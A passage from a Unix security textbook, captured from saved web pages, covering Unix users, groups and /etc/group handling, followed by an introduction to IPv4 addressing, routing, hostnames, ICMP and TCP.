delete each other's files and can kill each other's programs. Giving two users the same UID is almost always a<br />

bad idea; we'll discuss a few exceptions in the next section.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch04_01.htm (2 of 7) [2002-04-12 10:44:36]


[Chapter 4] Users, Groups, and the Superuser<br />

4.1.2 Multiple Accounts with the Same UID<br />

There are two exceptions when having multiple usernames with the same UID is sensible. The first is for<br />

logins used for the UUCP system. In this case, it is desirable to have multiple UUCP logins with different<br />

passwords and usernames, but all with the same UID. This allows you to track logins from separate sites, but<br />

still allows each of them access to the shared files. Ways of securing the UUCP system are described in detail<br />

in Chapter 15, UUCP.<br />

The second exception to the rule about only one username per UID is when you have multiple people with<br />

access to a system account, including the superuser account, and you want to track their activities via the audit<br />

trail. By creating separate usernames with the same UID, and giving the users access to only one of these<br />

identities, you can do some monitoring of usage. You can also disable access for one person without disabling<br />

it for all.<br />

As an example, consider the case where you may have three people helping administer your Usenet news<br />

software and files. The password file entry for news is duplicated in the /etc/passwd file as follows:<br />

root:zPDeHbougaPpA:0:1:Operator:/:/bin/ksh<br />

nobody:*:60001:60001::/tmp:<br />

daemon:*:1:1::/tmp:<br />

ftp:*:3:3:FTP User:/usr/spool/ftp:<br />

news:*:6:6::/usr/spool/news:/bin/csh<br />

newsa:Wx3uoih3B.Aee:6:6:News co-admin Sabrina:/usr/spool/news:/bin/csh<br />

newsb:ABll2qmPi/fty:6:6:News co-admin Rachel:/usr/spool/news:/bin/sh<br />

newsc:x/qnr4sa70uQz:6:6:News co-admin Fred:/usr/spool/news:/bin/ksh<br />

Each of the three helpers has a unique password, so they can be shut out of the news account, if necessary,<br />

without denying access to the others. Also, the activities of each can now be tracked if the audit mechanisms<br />

record the account name instead of the UID (most do, as we describe in Chapter 10, Auditing and Logging).<br />

Because the first entry in the passwd file for UID 6 has the account name news, any listing of file ownership<br />

will show files belonging to user news, not to newsb or one of the other users. Also note that each user can pick<br />

his or her own command interpreter (shell) without inflicting that choice on the others.<br />

This approach should only be used for system-level accounts, not for personal accounts. Furthermore, you<br />

should institute rules in your organizations that require users (Sabrina, Rachel, and Fred) to log in to their own<br />

personal accounts first, then su to their news maintenance accounts - this provides another level of<br />

accountability and identity verification. (See the discussion of su later in this chapter.) Unfortunately, in most<br />

versions of <strong>UNIX</strong>, there is no way to enforce this requirement, except by preventing root from logging on to<br />

particular devices.<br />

4.1.3 Groups and Group Identifiers (GIDs)<br />

Every <strong>UNIX</strong> user belongs to one or more groups. Like user accounts, groups have both a groupname and a<br />

group identification number (GID). GID values are also historically 16-bit integers.<br />

As the name implies, <strong>UNIX</strong> groups are used to group users together. As with usernames, groupnames and<br />

numbers are assigned by the system administrator when each user's account is created. Groups can be used by<br />

the system administrator to designate sets of users who are allowed to read, write, and/or execute specific files,<br />

directories, or devices.<br />

Each user belongs to a primary group that is stored in the /etc/passwd file. The GID of the user's primary<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch04_01.htm (3 of 7) [2002-04-12 10:44:36]


group follows the user's UID. Consider, again, our /etc/passwd example:<br />

rachel:eH5/.mj7NB3dx:181:100:Rachel Cohen:/u/rachel:/bin/ksh<br />

In this example, Rachel's primary GID is 100.<br />

Groups provide a handy mechanism for treating a number of users in a certain way. For example, you might<br />

want to set up a group for a team of students working on a project so that students in the group, but nobody<br />

else, can read and modify the team's files.<br />

Groups can also be used to restrict access to sensitive information or specially licensed applications to a<br />

particular set of users: for example, many <strong>UNIX</strong> computers are set up so that only users who belong to the<br />

kmem group can examine the operating system's kernel memory. The ingres group is commonly used to allow<br />

only registered users to execute the commercial Ingres database program. And a sources group might be<br />

limited to people who have signed nondisclosure forms so as to be able to view the source code for some<br />

software.<br />

NOTE: Some special versions of <strong>UNIX</strong> support MAC (Mandatory Access Controls), which have<br />

controls based on data labeling instead of, or in addition to, the traditional <strong>UNIX</strong> DAC<br />

(Discretionary Access Controls). MAC-based systems do not use traditional <strong>UNIX</strong> groups.<br />

Instead, the GID values and the /etc/group file may be used to specify security access control<br />

labeling or to point to capability lists. If you are using one of these systems, you should consult<br />

the vendor documentation to ascertain what the actual format and use of these values might be.<br />

4.1.3.1 The /etc/group file<br />

The /etc/group file contains the database that lists every group on your computer and its corresponding GID.<br />

Its format is similar to the format used by the /etc/passwd file.[3]<br />

[3] As with the password file, if your site is running NIS, NIS+, NetInfo, or DCE, the /etc/group<br />

file may be incomplete or missing. See the discussion in "The /etc/passwd File and Network<br />

Databases" in Chapter 3.<br />

Here is a sample /etc/group file that defines five groups: wheel, uucp, vision, startrek, and users:<br />

wheel:*:0:root,rachel<br />

uucp:*:10:uucp<br />

users:*:100:<br />

vision:*:101:keith,arlin,janice<br />

startrek:*:102:janice,karen,arlin<br />

The first line of this file defines the wheel group. The fields are explained in Table 4.1.<br />

Table 4.1: Wheel Group Fields<br />

Field Contents Description<br />

wheel The group name<br />

* The group's "password" (described below)<br />

0 The group's GID<br />

root, rachel The list of the users who are in the group<br />

.<br />

[Chapter 4] Users, Groups, and the Superuser<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch04_01.htm (4 of 7) [2002-04-12 10:44:36]


[Chapter 4] Users, Groups, and the Superuser<br />

Most versions of <strong>UNIX</strong> use the wheel group[4] as the list of all of the computer's system administrators (in this<br />

case, rachel and the root user are the only members). The second line of this file defines the uucp group. The<br />

only member in the uucp group is the uucp user. The third line defines the users group; the users group does<br />

not explicitly list any users; each user on this particular system is a member of the users group by virtue of<br />

their individual entries in the /etc/passwd file.<br />

[4] Not all versions of <strong>UNIX</strong> call this group wheel; this is group 0, regardless of what it is named.<br />

The remaining two lines define two groups of users. The vision group includes the users keith, arlin and janice.<br />

The startrek group contains the users janice, karen, and arlin. Notice that the order in which the usernames are<br />

listed on each line is not important. (This group is depicted graphically in Figure 4.1.)<br />

Remember, the users mentioned in the /etc/group file are in these groups in addition to the groups mentioned<br />

as their primary groups in the file /etc/passwd. For example, Rachel is in the users group even though she does<br />

not appear in that group in the file /etc/group because her primary group number is 100. On some versions of<br />

<strong>UNIX</strong>, you can issue the groups command or the id command to list which groups you are currently in.<br />

Groups are handled differently by versions of System V <strong>UNIX</strong> before Release 4 and by Berkeley <strong>UNIX</strong>;<br />

SVR4 incorporates the semantics of BSD groups.<br />

NOTE: It is not necessary for there to be an entry in the /etc/group file for a group to exist! As<br />

with UIDs and account names, <strong>UNIX</strong> actually uses only the integer part of the GID for all settings<br />

and permissions. The name in the /etc/group file is simply a convenience for the users - a means<br />

of associating a mnemonic with the GID value.<br />

Figure 4.1 illustrates how users can be included in multiple groups.<br />

Figure 4.1: Users and groups<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch04_01.htm (5 of 7) [2002-04-12 10:44:36]


[Chapter 4] Users, Groups, and the Superuser<br />

4.1.3.2 Groups and older AT&T <strong>UNIX</strong><br />

Under versions of AT&T <strong>UNIX</strong> before SVR4, a user can occupy only a single group at a time. To change your<br />

current group, you must use the newgrp command. The newgrp command takes a single argument: the name of<br />

the group that you're attempting to change into. If the newgrp command succeeds, it execs a shell that has a<br />

different GID, but the same UID:<br />

$ newgrp news<br />

$<br />

This is similar to the su command used to change UID.<br />

Usually, you'll want to change into only these groups in which you're already a member; that is, groups that<br />

have your username mentioned on their line in the /etc/group file. However, the newgrp command also allows<br />

you to change into a group of which you're not normally a member. For this purpose, <strong>UNIX</strong> uses the group<br />

password field of the /etc/group file. If you try to change into a group of which you're not a member, the<br />

newgrp command will prompt you for that group's password. If the password you type agrees with the<br />

password for the group stored in the /etc/group file, the newgrp command temporarily puts you into the group<br />

by spawning a subshell with that group:<br />

$ newgrp fiction<br />

password: rates34<br />

$<br />

You're now free to exercise all of the rights and privileges of the fiction group.<br />

The password in the /etc/group file is interpreted exactly like the passwords in the /etc/passwd file, including<br />

salts (described in Chapter 8, Defending Your Accounts). However, most systems do not have a program to<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch04_01.htm (6 of 7) [2002-04-12 10:44:36]


[Chapter 4] Users, Groups, and the Superuser<br />

install or change the passwords in this file. To set a group password, you must first assign it to a user with the<br />

passwd command, then use a text editor to copy the encrypted password out of the /etc/passwd file and into the<br />

/etc/group file. Alternatively, you can encode the password using the /usr/lib/makekey program (if present) and<br />

edit the result into the /etc/group file in the appropriate place.[5]<br />

[5] We suspect that passwords have seldom been used in the group file. Otherwise, by now<br />

someone would have developed an easier, one-step method of updating the passwords. <strong>UNIX</strong><br />

gurus tend to write tools for anything they have to do more than twice and that require more than<br />

a few simple steps. Updating passwords in the group file is an obvious candidate, but a<br />

corresponding tool has not been developed. Ergo, the operation must not be common.<br />

NOTE: Some versions of <strong>UNIX</strong>, such as AIX, do not support group passwords.<br />

4.1.3.3 Groups and BSD or SVR4 <strong>UNIX</strong><br />

One of the many enhancements that the Berkeley group made to the <strong>UNIX</strong> operating system was to allow<br />

users to reside in more than one group at a time. When a user logs in to a Berkeley <strong>UNIX</strong> system, the program<br />

/bin/login scans the entire /etc/group file and places the user into all of the groups in which that user is<br />

listed.[6] The user is also placed in the primary group listed in the user's /etc/passwd file entry. When the<br />

system needs to determine access rights to something based on the user's membership in a group, it checks all<br />

the current groups for the user to determine if that access should be granted (or denied).<br />

[6] If you are on a system that uses NIS, NIS+ or some other system for managing user accounts<br />

throughout a network, these network databases will be referenced as well. For more information,<br />

see Chapter 19, RPC, NIS, NIS+, and Kerberos.<br />

Thus, Berkeley and SVR4 <strong>UNIX</strong> have no obvious need for the newgrp command - indeed, many of the<br />

versions do not include it. However, there may be a need for it in some cases. If you have a group entry with<br />

no users listed but a valid password field, you might want to have some users run the newgrp program to enter<br />

that group. This action will be logged in the audit files, and can be used for accounting or activity tracking.<br />

However, situations where you might want to use this are likely to be rare. Note, however, that some systems,<br />

including AIX, do not support use of a password in the /etc/group file, although they may allow use of the<br />

newgrp command to change primary group.<br />

3.8 Summary 4.2 Special Usernames<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch04_01.htm (7 of 7) [2002-04-12 10:44:36]


[Chapter 16] 16.2 IPv4: The <strong>Internet</strong> Protocol Version 4<br />

Chapter 16<br />

TCP/IP Networks<br />

16.2 IPv4: The <strong>Internet</strong> Protocol Version 4<br />

The <strong>Internet</strong> Protocol is the glue that holds together modern computer networks. IP specifies the way that messages<br />

are sent from computer to computer; it essentially defines a common "language" that is spoken by every computer<br />

stationed on the <strong>Internet</strong>.<br />

This section describes IPv4, the fourth version of the <strong>Internet</strong> Protocol, which has been used on the <strong>Internet</strong> since<br />

1982. As this book is going to press, work is continuing on IPv6, previously called "IP: The Next Generation," or<br />

IPng. (IPv5 was an experimental protocol that was never widely used.) We do not know when (or if) IPv6 will be<br />

widely used on the network.<br />

As we said earlier, at a very abstract level the <strong>Internet</strong> is similar to the phone network. However, as we look more<br />

closely at the underlying protocols, we find that it is quite different. On the telephone network, each conversation is<br />

assigned a circuit (either a pair of wires or a channel on a multiplexed connection) that it uses for the duration of the<br />

telephone call. Whether you talk or not, the channel remains open until you hang up the phone.<br />

On the <strong>Internet</strong>, the connections between computers are shared by all of the conversations. Data is sent in blocks of<br />

characters called datagrams, or more colloquially, packets. Each packet has a small block of bytes called the header,<br />

which identifies its sender and intended destination on each computer. The header is followed by another, usually<br />

larger, block of characters of data called the packet's contents. (See Figure 16.3.) After the packets reach their<br />

destination, they are often reassembled into a continuous stream of data; this fragmentation and reassembly process is<br />

usually invisible to the user. As there are often many different routes from one system to another, each packet may<br />

take a slightly different path from source to destination. Because the <strong>Internet</strong> switches packets, instead of circuits, it is<br />

called a packet-switching network.<br />

Figure 16.3: IP header and packet<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch16_02.htm (1 of 15) [2002-04-12 10:44:38]


[Chapter 16] 16.2 IPv4: The <strong>Internet</strong> Protocol Version 4<br />

We'll borrow an analogy from Vint Cerf, one of the original architects of the ARPANET: think of the IP protocol as<br />

sending a novel a page at a time, numbered and glued to the back of postcards. All the postcards from every user get<br />

thrown together and carried by the same trucks to their destinations, where they get sorted out. Sometimes, the<br />

postcards get delivered out of order. Sometimes, a postcard may not get delivered at all, but you can use the page<br />

numbers to request another copy. And, key for security, anyone in the postal service who handles the post cards can<br />

read the contents without the recipient or sender knowing about it.<br />

There are three distinct ways to directly connect two computers together using IP:<br />

●<br />

●<br />

●<br />

The computers can all be connected to the same local area network. Two common LANS are Ethernet and<br />

token ring. <strong>Internet</strong> packets are then encapsulated within the packets used by the local area network.[4]<br />

[4] LANs and token rings can also carry protocols other than IP (including Novell IPX and<br />

Appletalk), often at the same time as IP network traffic.<br />

Two computers can be directly connected to each other with a serial line. IP packets are then sent using either<br />

SLIP (Serial Line <strong>Internet</strong> Protocol), CSLIP (Compressed SLIP), or PPP (Point-to-Point Protocol). If both<br />

computers are each in turn connected to a local area network, the telephone link will bridge together the two<br />

LANS. (See Figure 16.4.)<br />

The IP packets can themselves be encapsulated within packets used by other network protocols. Today, many<br />

56K "leased lines" are actually built by encapsulating IP packets within Frame Relay packets. Within a few<br />

years, IP may be commonly encapsulated within ATM (Asynchronous Transfer Mode) networks.[5]<br />

[5] If our use of all these network terms is causing your eyes to roll back into your head and a loud<br />

buzzing sound to fill your ears, take a break and several deep breaths. Then consult a book on IP<br />

and networks for a more complete explanation. We recommend the excellent <strong>Internet</strong>working with<br />

TCP/IP by Doug Comer (Prentice Hall, 1991).<br />

Figure 16.4: Bridging two local area networks<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch16_02.htm (2 of 15) [2002-04-12 10:44:38]


[Chapter 16] 16.2 IPv4: The <strong>Internet</strong> Protocol Version 4<br />

IP is a scalable network protocol: it works as well with a small office network of ten workstations as it does with a<br />

university-sized network supporting a few hundred workstations, or with the national (and international) networks that<br />

support tens of thousands of computers. IP scales because it views these large networks merely as collections of<br />

smaller ones. Computers connected to a network are called hosts. Computers that are connected to two or more<br />

networks can be programmed to forward packets automatically from one network to another; today, these computers<br />

are called routers (originally they were called gateways). Routers use routing tables to determine where to send<br />

packets next.<br />

16.2.1 <strong>Internet</strong> Addresses<br />

Every interface that a computer has on an IP network is assigned a unique 32-bit address. These addresses are often<br />

expressed as a set of four 8-bit numbers, called octets. A sample address is 18.70.0.224. Think of an IP address as if it<br />

were a telephone number: if you know a computer's IP address, you can connect to it and exchange information.<br />

Theoretically, the 32-bit IP address allows a maximum of 232 = 4,294,967,296 computers to be attached to the<br />

<strong>Internet</strong> at a given time. In practice, the total number of computers that can be connected is much less, because of the<br />

way that IP addresses are assigned. Organizations are usually assigned blocks of addresses, not all of which are used.<br />

This approach is similar to the method by which the phone company assigns area codes to a region. The approach has<br />

led to a problem with IP addresses similar to that faced by the telephone company: we're running out of numbers.<br />

Here are some more sample <strong>Internet</strong> addresses:<br />

18.85.0.2<br />

198.3.5.1<br />

204.17.195.100<br />

IP addresses are typically abbreviated ii.jj.kk.ll, where the numbers ii, jj, kk, and ll are between 0 and 255. Each<br />

decimal number represents an 8-bit octet. Together, they represent the 32-bit IP address.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch16_02.htm (3 of 15) [2002-04-12 10:44:38]


[Chapter 16] 16.2 IPv4: The <strong>Internet</strong> Protocol Version 4<br />

16.2.1.1 IP networks<br />

The <strong>Internet</strong> is a network of networks. Although most people think of these networks as major networks, such as those<br />

belonging to companies like AT&T, MCI, and Sprint, the networks that make up the <strong>Internet</strong> are actually local area<br />

networks, such as the network in your office building or the network in a small research laboratory. Each of these<br />

small networks is given its own network number.<br />

There are two methods of looking at network numbers. The "classical" network numbers were distinguished by a<br />

unique prefix of bits in the address of each host in the network. This approach partitioned the address space into a<br />

well-defined set of different size networks. However, several of these networks had large "holes" - sets of host<br />

addresses that were never used. With the explosion of sites on the <strong>Internet</strong>, a somewhat different interpretation of<br />

network addresses has been proposed, to result in some additional addresses that can be assigned to networks and<br />

hosts. This approach is the CIDR (Classless InterDomain Routing) scheme. We briefly describe both schemes below.<br />

The CIDR method may not be adequate to provide addresses for all the expected hosts on the network; therefore, as<br />

we've mentioned, a new protocol, IPv6, is being developed. This new protocol will provide a bigger address space for<br />

hosts and networks, and will provide some additional security features. Host addresses will be 128 bits long in IPv6.<br />

As this book goes to press, the features of IPv6 are not completely finalized, so we won't try to detail them here.[6]<br />

[6] But you can be sure we'll cover them in the next edition!<br />

16.2.1.2 Classical network addresses<br />

There are five primary kinds of IP addresses in the "classical" address scheme; the first few bits of the address<br />

(themost significant bits) define the class of network to which the address belongs. The remaining bits are divided into<br />

a network part and a host part:<br />

Class A addresses<br />

Hosts on Class A networks have addresses in the form N.a.b.c, where N is the network number and a.b.c is the<br />

host number; the most significant bit of N must be zero. There are not many Class A networks, as they are quite<br />

wasteful: unless your network has 16,777,216 separate hosts, you don't need a Class A network. Nevertheless,<br />

many early pioneers of the <strong>Internet</strong>, such as MIT and Bolt Beranek and Newman (BBN), have been assigned<br />

Class A networks. Of course, these organizations don't really put all of their computers on the same piece of<br />

network. Instead, most of them divide their internal networks as (effectively) Class B or Class C networks. This<br />

approach is known as subnetting.<br />

Class B addresses<br />

Hosts on Class B networks have addresses in the form N.M.a.b, where N.M is the network number and a.b is the<br />

host number; the most significant two bits of N must be 10. Class B networks are commonly found at large<br />

universities and major commercial organizations.<br />

Class C addresses<br />

Hosts on Class C networks have addresses in the form N.M.O.a, where N.M.O is the network number and a is<br />

the host number; the most significant three bits of N must be 110. These networks can only accommodate a<br />

maximum of 254 hosts. (Flaws and incompatibilities between various <strong>UNIX</strong> IP implementations make it unwise<br />

to assign IP addresses ending in 0 or 255.) Most organizations have one or more Class C networks.<br />

Class D addresses<br />

A Class D address is of the form N.M.O.a, where the most significant four bits of N are 1110. These addresses<br />

are not actually of networks, but of multicast groups - sets of hosts that listen on a common address to receive<br />

broadcast addresses.<br />

Class E addresses<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch16_02.htm (4 of 15) [2002-04-12 10:44:38]


[Chapter 16] 16.2 IPv4: The <strong>Internet</strong> Protocol Version 4<br />

A Class E address is of the form N.M.O.P, where the most significant four bits of N are 1111. These addresses<br />

are currently reserved for experimental use.<br />

16.2.1.3 CIDR addresses<br />

In recent years, a new form of address assignment has been developed. This assignment is the CIDR, or Classless<br />

InterDomain Routing, method. As the name implies, there are no "classes" of addresses as in the classical scheme.<br />

Instead, networks are defined as being the most significant k bits of each address, with the remaining 32-k bits being<br />

used for the host part of the address. Thus, a service provider could be given a range of addresses whereby the first 12<br />

bits of the address are fixed at a particular value (the network address), and the remaining 20 bits represent the host<br />

portion of the address. This method allows the service provider to allocate up to 220 distinct addresses to customers.<br />

In reality, the host portion of an address is further divided into subnets. This subdivision is done by fixing the first<br />

jbits of the host portion of the address to some set value, and using the remaining bits for host addresses. And those<br />

can be further divided into subnets, and so on. A CIDR-format address is of the form k.j.l.(m...n), where each of the<br />

fields is of variable length. Thus, the fictional service-provider network address described above could be subdivided<br />

into 1024 subnets, one for each customer. Each customer would have 210 bits of host address, which they could<br />

further subdivide into local subnets.<br />

The CIDR scheme is compatible with the classical address format, with Class A addresses using an 8-bit network<br />

field, Class B networks using a 16-bit network address, and so on. CIDR is being adopted as this book goes to press.<br />

Combined with new developments in IP address rewriting, there is the potential to spread out the useful life of IPv4<br />

for many years to come.<br />

16.2.2 Routing<br />

Despite the complexity of the <strong>Internet</strong> and addressing, computers can easily send each other messages across the<br />

global network. To send a packet, most computers simply set the packet's destination address and then send the packet<br />

to a computer on their local network called a gateway. If the gateway makes a determination of where to send the<br />

packet next, the gateway is a router. The router takes care of sending the packet to its final destination by forwarding<br />

the packet on to a directly connected gateway that is one step closer to the destination host.<br />

Many organizations configure their internal networks as a large tree. At the root of the tree is the organization's<br />

connection to the <strong>Internet</strong>. When a gateway receives a packet, it decides whether to send it to one of its own<br />

subnetworks, or to direct it towards the root.<br />

Out on the <strong>Internet</strong>, major IP providers such as AT&T, BBN Planet, MCI, and Sprint have far more complicated<br />

networks with sophisticated routing algorithms. Many of these providers have redundant networks, so that if one link<br />

malfunctions other links can take over.<br />

Nevertheless, from the point of view of any computer on the <strong>Internet</strong>, routing is transparent, regardless of whether<br />

packets are being sent across the room or across the world. The only information that you need to know to make a<br />

connection to another computer on the <strong>Internet</strong> is the computer's 32-bit IP address - you do not need to know the route<br />

to the host, or on what type of network the host resides. You do not even need to know if the host is connected by a<br />

high-speed local area network, or if it is at the other end of a modem-based SLIP connection. All you need to know is<br />

its address, and your packets are on their way.<br />

Of course, if you are the site administrator and you are configuring the routing on your system, you do need to be<br />

concerned with a little more than the IP number of a destination machine. You must know at least the addresses of<br />

gateways out of your network so you can configure your routing tables. We'll assume you know how to do that,[7] but<br />

we will point out that if your routes are fairly stable and simple, you would be safer by statically setting the routes<br />

rather than allowing them to be set dynamically with a mechanism such as the routed daemon.<br />

[7] If not, you should consult your vendor manual, or one of the references in Appendix D, Paper<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch16_02.htm (5 of 15) [2002-04-12 10:44:38]


[Chapter 16] 16.2 IPv4: The <strong>Internet</strong> Protocol Version 4<br />

Sources.<br />

16.2.3 Hostnames<br />

A hostname is the name of a computer on the <strong>Internet</strong>. Hostnames make life easier for users: they are easier to<br />

remember than IP addresses. You can change a computer's IP address but keep its hostname the same. If you think of<br />

an IP address as a computer's phone number, think of its hostname as the name under which it is listed in the<br />

telephone book. Some hosts can also have more than one address on more than one network. Rather than needing to<br />

remember each one, you can remember a single hostname and let the underlying network mechanisms pick the most<br />

appropriate addresses to use.<br />

Let us repeat that: a single hostname can have more than one IP address, and a single IP address can be associated<br />

with more than one hostname. Both of these facts have profound implications for people who are attempting to write<br />

secure network programs.<br />

Hostnames must begin with a letter or number and may contain letters, numbers, and a few symbols, such as the dash<br />

(-). Case is ignored. A sample hostname is arthur.cs.purdue.edu. For more information on host names, see RFC 1122<br />

and RFC 1123.<br />

Each hostname has two parts: the computer's machine name and its domain. The computer's machine name is the<br />

name to the left of the first period; the domain name is everything to the right of the first period. In our example<br />

above, the machine name is arthur and the domain is cs.purdue.edu. The domain name may represent further<br />

hierarchical domains if there is a period in the name. For instance, cs.purdue.edu represents the Computer Sciences<br />

department domain, which is part of the Purdue University domain, which is, in turn, part of the Educational<br />

Institutions domain.<br />

Here are some other examples:<br />

whitehouse.gov next.cambridge.ma.us jade.tufts.edu<br />

If you specify a machine name, but do not specify a domain, then your computer might append a default domain when<br />

it tries to resolve the name's IP address. Alternatively, your computer might simply return an "unknown host" error<br />

message.<br />

16.2.3.1 The /etc/hosts file<br />

Early <strong>UNIX</strong> systems used a single file called /etc/hosts to keep track of the network address for each host on the<br />

<strong>Internet</strong>. Many systems still use this file today to keep track of the IP addresses of computers on the organization's<br />

LAN.<br />

A sample /etc/hosts file for a small organization might look like this:<br />

# /etc/hosts<br />

#<br />

192.42.0.1 server<br />

192.42.0.2 art<br />

192.42.0.3 science sci<br />

192.42.0.4 engineering eng<br />

In this example, the computer called server has the network address 192.42.0.1. The computer called engineering has<br />

the address 192.42.0.4. The hostname sci following the computer called science means that sci can be used as a<br />

second name, or alias, for that computer.<br />

In the early 1980s, the number of hosts on the <strong>Internet</strong> started to jump from thousands to tens of thousands and more.<br />

Maintaining a single file of host names and addresses soon proved to be impossible. Instead, the <strong>Internet</strong> adopted a<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch16_02.htm (6 of 15) [2002-04-12 10:44:38]


[Chapter 16] 16.2 IPv4: The <strong>Internet</strong> Protocol Version 4<br />

distributed system for hostname resolution known as the Domain Name System (DNS). For more information, see the<br />

"Name Service" section later in this chapter.<br />

16.2.4 Packets and Protocols<br />

Today there are four main kinds of IP packets that are sent on the <strong>Internet</strong> that will be seen by typical hosts. Each is<br />

associated with a particular protocol:[8]<br />

[8] There may be some special routing or maintenance protocols in use on the <strong>Internet</strong> backbone or other<br />

major network trunks. However, we won't discuss them here as you are unlikely to ever encounter them.<br />

ICMP<br />

TCP<br />

UDP<br />

IGMP<br />

<strong>Internet</strong> Control Message Protocol. This protocol is used for low-level operation of the IP protocol. There are<br />

several subtypes, for example, for the exchange of routing and traffic information.<br />

Transmission Control Protocol. This protocol is used to create a two-way stream connection between two<br />

computers. It is a "connected" protocol, and includes time-outs and retransmission to ensure reliable delivery of<br />

information.<br />

User Datagram Protocol.[9] This protocol is used to send packets from host to host. The protocol is<br />

"connectionless" and makes a best-effort attempt at delivery.<br />

[9] UDP does not stand for Unreliable Datagram Protocol, even though the protocol is technically<br />

unreliable because it does not guarantee that information sent will be delivered. We use the term<br />

best-effortbecause the underlying network infrastructure is expected to make its best effort to get<br />

the packets to their destination. In fact, most UDP packets reach their destination under normal<br />

operating circumstances.<br />

<strong>Internet</strong> Group Management Protocol. This protocol is used to control multicasting - the process of purposely<br />

directing a packet to more than one host. Multicasting is the basis of the <strong>Internet</strong>'s multimedia backbone, the<br />

MBONE. (Currently, IGMP is not used inside the MBONE, but is used on the edge.)<br />

16.2.4.1 ICMP<br />

The <strong>Internet</strong> Control Message Protocol is used to send messages between gateways and hosts regarding the low-level<br />

operation of the <strong>Internet</strong>. For example, ICMP Echo packets are commonly used to test for network connectivity; the<br />

response is usually either an ICMP Echo Reply or an ICMP Destination Unreachable message type. ICMP packets are<br />

identified by an 8-bit TYPE field (see Table 16.1):<br />

Table 16.1: ICMP Packet Types<br />

TYPE Field ICMP Message Type<br />

0 Echo Reply (used by ping)<br />

3 Destination Unreachable<br />

4 Source Quench<br />

5 Redirect (change a route)<br />

8 Echo Request (used by ping)<br />

9 Router Advertisement<br />

10 Router Solicitation<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch16_02.htm (7 of 15) [2002-04-12 10:44:38]


[Chapter 16] 16.2 IPv4: The <strong>Internet</strong> Protocol Version 4<br />

11 Time Exceeded for a Datagram<br />

12 Parameter Problem on a Datagram<br />

13 Timestamp Request<br />

14 Timestamp Reply<br />

15 Information Request (obsolete)<br />

16 Information Reply (obsolete)<br />

17 Address-Mask Request<br />

18 Address-Mask Reply<br />

Although we have included all types for completeness, the most important types for our purposes are types 3, 4, and 5.<br />

An attacker can craft ICMP packets with these fields to redirect your network traffic away, or to perform a denial of<br />

service. If you use a firewall (discussed in Chapter 21, Firewalls), you will want to be sure that these types are blocked<br />

or monitored.<br />

16.2.4.2 TCP<br />

TCP provides a reliable, ordered, two-way transmission stream between two programs that are running on the same or<br />

different computers. "Reliable" means that every byte transmitted is guaranteed to reach its destination (or you are<br />

notified that the transmission failed), and that each byte arrives in the order in which it is sent. Of course, if the<br />

connection is physically broken, bytes that have not yet been transmitted will not reach their destination unless an<br />

alternate route can be found. In such an event, the computer's TCP implementation will send an error message to the<br />

process that is trying to send or receive characters, rather than give the impression that the link is still operational.<br />

Each TCP connection is attached at each end to a port. Ports are identified by 16-bit numbers. Indeed, at any instant,<br />

every connection on the <strong>Internet</strong> can be identified by a set of two 32-bit numbers and two 16-bit numbers:<br />

●<br />

●<br />

●<br />

●<br />

Host address of the connection's originator<br />

Port number of the connection's originator<br />

Host address of the connection's target<br />

Port number of the connection's target<br />

For example, Figure 16.5 shows three people on three separate workstations logged into a server using the rlogin<br />

program. Each process's TCP connection starts on a different host and at a different originating port number, but each<br />

connection terminates on the same host (the server) and the same port (513).<br />

Figure 16.5: A few <strong>Internet</strong> connections with port numbers<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch16_02.htm (8 of 15) [2002-04-12 10:44:38]


[Chapter 16] 16.2 IPv4: The <strong>Internet</strong> Protocol Version 4<br />

The idea that the workstations are all connecting to port number 513 can be confusing. Nevertheless, these are all<br />

distinct connections, because each one is coming from a different originating host-port pair, and the server moves each<br />

connection to a separate, higher-numbered port.<br />

The TCP protocol uses two special bits in the packet header, SYN and ACK, to negotiate the creation of new<br />

connections. To open a TCP connection, the requesting host sends a packet that has the SYN bit set but does not have<br />

the ACK bit set. The receiving host acknowledges the request by sending back a packet that has both the SYN and the<br />

ACK bits set. Finally, the originating host sends a third packet, again with the ACK bit set, but this time with the SYN<br />

bit unset. This process is called the TCP " three-way handshake," and is shown in Figure 16.6. By looking for packets<br />

that have the ACK bit unset, one can distinguish packets requesting new connections from those which are being sent<br />

in response to connections that have already been created. This distinction is useful when constructing packet filtering<br />

firewalls, as we shall see in Chapter 21.<br />

Figure 16.6: The TCP/IP "three-way handshake"<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch16_02.htm (9 of 15) [2002-04-12 10:44:38]


[Chapter 16] 16.2 IPv4: The <strong>Internet</strong> Protocol Version 4<br />

TCP is used for most <strong>Internet</strong> services which require the sustained synchronous transmission of a stream of data in one<br />

or two directions. For example, TCP is used for remote terminal service, file transfer, and electronic mail. TCP is also<br />

used for sending commands to displays using the X Window System.<br />

Table 16.2 identifies some TCP services commonly enabled on <strong>UNIX</strong> machines. These services and port numbers are<br />

usually found in the /etc/services file.[10] (Note that non-<strong>UNIX</strong> hosts can run most of these services; the protocols are<br />

usually specified independent of any particular implementation.)<br />

[10] A more extensive list of TCP and UDP ports and services may be found in Appendix G, Table of IP<br />

Services.<br />

Table 16.2: Some Common TCP Services and Ports<br />

